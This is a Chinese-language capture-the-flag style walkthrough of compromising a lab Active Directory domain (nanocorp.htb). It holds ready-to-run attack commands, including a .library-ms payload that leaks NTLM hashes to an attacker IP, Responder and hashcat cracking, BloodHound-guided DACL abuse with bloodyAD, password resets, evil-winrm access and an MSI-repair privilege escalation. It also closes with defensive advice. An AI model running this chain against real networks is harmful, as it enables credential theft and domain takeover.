域渗透,bloodhound利用
字数 1636 2025-11-21 13:13:25
域渗透与BloodHound利用实战教学
概述
本教学文档详细记录了从信息收集到域渗透完成的完整过程,重点演示了BloodHound在域环境渗透中的实际应用。
环境信息
- 目标IP:10.10.11.93
- 域名:nanocorp.htb
- 域控制器:DC01.nanocorp.htb
- 操作系统:Microsoft Windows Server 2022
第一阶段:信息收集
端口扫描
使用Nmap进行全端口扫描,识别开放服务:
sudo nmap -O -A -Pn -T3 -p- 10.10.11.93
关键发现:
- 53/tcp:DNS服务
- 80/tcp:HTTP服务(Apache/2.4.58,重定向到nanocorp.htb)
- 88/tcp:Kerberos认证
- 135/tcp:RPC服务
- 139/445/tcp:SMB服务
- 389/636/tcp:LDAP服务(域:nanocorp.htb)
- 5986/tcp:WinRM服务(HTTPS)
Web应用分析
- 目录扫描未发现明显漏洞
- 发现"关于我们"页面存在文件上传功能
- 上传后文件自动解压,存在安全风险
第二阶段:漏洞利用
CVE-2025-24071利用
利用Windows资源管理器处理.library-ms文件的漏洞触发SMB身份验证泄漏。
攻击步骤:
- 生成恶意ZIP文件
python3 poc.py
Enter your file name: exp
Enter IP (EX: 192.168.1.162): 10.10.16.69
- ZIP文件内容分析
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.16.69\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
- 启动Responder监听
sudo python3 Responder.py -I tun0 -v
- 上传恶意文件触发哈希泄漏
成功获取web_svc用户的NTLMv2哈希:
web_svc::NANOCORP:cee11bd7e702b1e2:A01391B16E1E85E7A4CEA2DC2D26FF14:...
密码破解
使用Hashcat破解NTLMv2哈希:
hashcat -m 5600 hash.txt rockyou.txt
破解结果:
- 用户名:web_svc
- 密码:dksehdgh712!@#
凭证验证
通过SMB验证凭证有效性:
smbclient -L //10.10.11.93 -U 'NANOCORP/web_svc%dksehdgh712!@#'
第三阶段:BloodHound分析
环境配置
- 解决Kerberos时间同步问题
sudo ntpdate 10.10.11.93
- 生成Kerberos配置文件
nxc smb 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' --generate-krb5-file krb5.conf
export KRB5_CONFIG=/home/ubuntu/krb5.conf
数据收集
使用bloodhound-python收集域信息:
sudo ntpdate nanocorp.htb && bloodhound-python -c All -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' -ns 10.10.11.93 --zip
收集到的信息:
- 1个域控制器
- 6个用户账户
- 53个安全组
- 2个组策略对象
- 2个组织单位
攻击路径分析
通过BloodHound发现关键攻击路径:
三步DACL滥用路径:
- AddSelf权限滥用:web_svc用户可主动加入特定组
- ForceChangePassword权限:加入特定组后获得对moniioring_svc的密码修改权限
- 远程管理权限:moniioring_svc具有远程管理组权限
第四阶段:权限提升
实施攻击路径
- 使用bloodyAD添加用户到目标组
bloodyAD -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' addGroupMember '目标组名' 'web_svc'
- 强制修改moniioring_svc密码
bloodyAD -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' setPassword 'moniioring_svc' '新密码'
- 通过WinRM连接
evil-winrm -i 10.10.11.93 -u 'moniioring_svc' -p '新密码'
特权提升(CVE-2024-0670)
漏洞背景:
- Windows Installer服务中的竞争条件和逻辑缺陷
- 允许本地权限提升
利用步骤:
-
识别MSI修复触发器
在注册表中查找相关的MSI安装包 -
创建利用脚本(exploit.ps1)
# 利用脚本内容
# 包含MSI修复触发和反向shell建立
- 上传必要工具
- nc.exe(Netcat)
- exploit.ps1(利用脚本)
- 执行攻击
PS C:\Temp> .\exploit.ps1
- 触发MSI修复
msiexec.exe /fa C:\Windows\Installer\1e6f2.msi /qn
关键知识点总结
技术要点
- NTLM中继攻击:通过文件上传功能触发SMB认证请求
- BloodHound路径分析:识别域内特权提升路径
- DACL滥用:利用Active Directory中的权限配置缺陷
- Windows服务漏洞:MSI安装服务的权限提升漏洞
防御建议
- 限制文件上传功能:对上传文件类型进行严格限制
- 监控SMB流量:检测异常的SMB认证请求
- 定期审计权限:检查域内用户的权限分配
- 及时安装补丁:修复已知的Windows漏洞
工具列表
- Nmap:端口扫描和服务识别
- Responder:LLMNR/NBT-NS毒化攻击
- Hashcat:密码哈希破解
- BloodHound:Active Directory权限分析
- bloodyAD:Active Directory操作工具
- Evil-WinRM:Windows远程管理
本教学文档完整展示了从外部侦察到域内权限提升的完整攻击链,强调了BloodHound在域渗透中的关键作用。